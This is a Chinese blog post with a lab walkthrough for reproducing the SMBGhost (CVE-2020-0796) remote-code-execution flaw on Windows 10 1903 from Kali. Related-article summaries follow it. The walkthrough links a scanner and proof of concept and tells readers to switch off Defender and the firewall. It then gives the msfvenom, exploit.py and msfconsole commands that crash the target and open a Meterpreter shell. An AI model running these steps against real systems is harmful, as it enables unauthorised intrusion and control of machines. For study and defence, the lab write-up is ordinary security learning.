永恒之黑漏洞复现

最新推荐文章于 2024-10-19 18:34:39 发布
最新推荐文章于 2024-10-19 18:34:39 发布
阅读量482 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/130968052
版权

一、实验环境搭建
系统镜像:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
建议使用迅雷下载,安装版本选win10专业版

安装完后记得一定要关闭defender,防火墙,保证win10和kali可以互ping
在这里插入图片描述

检测工具CVE-2020-0796-Scanner:
https://pan.baidu.com/s/1U4CHnUhgf1KN3JhCjLbGhw 提取码:b2pd
POC:
https://pan.baidu.com/s/18E5q1S33d-Fw8M6GRkZzfw 提取码:xrnw
二、怎么关闭defenderwin10杀毒 关闭defenderwin10杀毒教程
 1、首先按下快捷键“ win+r ”打开运行输入“ gpedit.msc ”。
在这里插入图片描述

2、然后即可进入“ 本地组策略编辑器 ”。
在这里插入图片描述

3、依次展开“ 管理模板 —> windows组件 —> windows defender防病毒程序 ”,
  双击右侧的“ 关闭defender防病毒程序 ”。
在这里插入图片描述

4、最后点击上方的“ 已启用 ”即可成功关闭。
在这里插入图片描述

三、漏洞验证
Kali主机对目标进行扫描 nmap -sS 192.168.162.2
在这里插入图片描述

说明已开放445端口,可利用
然后使用漏洞扫描工具CVE-2020-0796-Scanner检测漏洞
在这里插入图片描述

1)打开kali,放入SMBGhost_RCE_PoC-master.zip到/root下,解压
2)首先使用msfvenom生成一个python类型的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python
在这里插入图片描述

3)将输出的内容复制,拷贝到exploit.py中,剪切替换原先的USER_PAYLOAD部分
在这里插入图片描述

4)蓝屏测试
再开一个终端,先执行 chmod +x exploit.py
再执行python3 exploit.py -ip 192.168.25.147
在这里插入图片描述

按回车可以触发蓝屏
在这里插入图片描述

此时会触发Win10蓝屏
5)接着msfconsole开启监听端口
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4488
set rhost 192.168.25.147 (Win10地址)
Run
在这里插入图片描述

继续使用python3 exploit.py -ip 192.168.25.147这时可以得到shell了
在这里插入图片描述在这里插入图片描述

四、总结
如果利用失败,有以下几点需要注意
1、看下是win10不是开启了自动更新,若有把他关闭
若最近已被装了补丁,则可在卸载程序里将补丁卸载重启即可
在这里插入图片描述

2、看SMB有没有都开启
在这里插入图片描述

3、看有没有关闭防火墙
4、看win10系统版本是不是1903
在这里插入图片描述

只为了拿0day
关注
永恒(CVE-2020-0796)漏洞复现
weixin_46463776的博客
04-15 930
永恒漏洞复现
CVE-2020-0796 WIN10 永恒漏洞复现
干铮的博客
08-14 1656
1.禁用windows update 2.关闭windows防火墙 3.主机发现 Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段 4.用msfvenom生成python类型的shellcode 5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的 6.MSF监听4444端口 use exploit/multi/handler set payload windows/x64...
漏洞复现_CVE-2020-0796 永恒漏洞_遇坑_已解决
qq_51550750的博客
06-09 4943
永恒漏洞复现
网络安全学习day6——永恒漏洞复现
weixin_55123346的博客
01-15 1489
永恒漏洞复现
漏洞复现】CVE-2020-0796永恒漏洞复现
weixin_67698311的博客
06-18 2566
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
windows10永恒(CVE-2020-0796)漏洞复现
2301_81305520的博客
03-07 2102
windows10永恒(CVE-2020-0796)漏洞复现
          永恒漏洞复现
Zhaokangkang123的博客
02-15 689
永恒漏洞复现
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 684
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
CVE-2020-0796“永恒漏洞复现
longanquan的博客
08-14 2247
永恒是2020年报出来的Windows10的系统漏洞 受影响的版本: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based
smbghost永恒复现
weixin_49891807的博客
07-02 1423
SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒。 影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows S
CVE-2020-0976永恒漏洞复现
qq_36918532的博客
03-13 4140
漏洞原理 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 影响版本 Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标 漏洞所需工具 漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0
永恒复现
qq_67181251的博客
05-07 2221
二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞(CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞(CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。栈溢出漏洞(Stack-Overflow)堆溢出漏洞(Heap-Overflow)释放后重引用漏洞(Use-After-Free)
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现
unlash的博客
10-20 7368
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
网络安全学习day6——永恒漏洞复现,腾讯T3手把手教你
2301_76190672的博客
04-09 868
1)环境搭建2) 查看win10和kali能否相互ping通3)使用工具检查靶机是否存在漏洞发现win10出现蓝屏,则证明漏洞存在4) kali进入msf,使用msf生成反向连接木马,命令如下:说明:#-e 编码方式#-i 编码次数#-b 在生成的程序中避免出现的值#LHOST,LPORT 监听上线的主机IP和端口#-f exe 生成EXE格式#‘\x00‘转义字符,对应ascall码中为null,因为是二进制文件所以会出现,在python中作为结束的标志,有点相当于%00截断的感觉。
永恒【CVE-2020-0796】漏洞详细复现
最新发布
2301_81807686的博客
10-19 557
漏洞后来被确认为 CVE-2020-0796,也被称为 “smbghost” 或 “永恒”。该漏洞存在于 srv2.sys 文件中,由于 SMBv3 没有正确处理压缩的数据包,在解压数据包时使用客户端传过来的长度进行解压,却没有检查长度是否合法,最终导致整数溢出。之后记得要将win10的防火墙关闭(我这的win10和kail都是NAT模式)在CVE-2020-0796-PoC目录下打开,查看目录下的文件,通过ls命令。准备一个有漏洞的win10,下载链接。测试漏洞(ip为win10ip)
2024年最新网络安全学习day6——永恒漏洞复现,2024年最新下血本买的
2401_84281594的博客
05-06 804
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。7)运行脚本,发起攻击。
漏洞复习】永恒
syhsa的博客
04-18 1707
总的来说,“永恒漏洞揭示了网络安全中的一个重要问题,即即使是由政府部门开发的漏洞工具,一旦泄露,也可能被客和恶意分子利用,对网络安全构成严重威胁。“永恒漏洞利用了微软Windows操作系统中的漏洞,主要是针对 SMB(Server Message Block)协议的漏洞。通过利用这些漏洞,攻击者可以远程执行代码,而无需用户交互,从而控制受感染的计算机。微软在意识到漏洞的严重性后,发布了紧急补丁来修复这些漏洞,建议用户尽快更新其Windows操作系统,以防止受到攻击的风险。
Kali:简单实现永恒复现漏洞CVE-2020-0796
2201_75638644的博客
03-12 1635
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒(CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值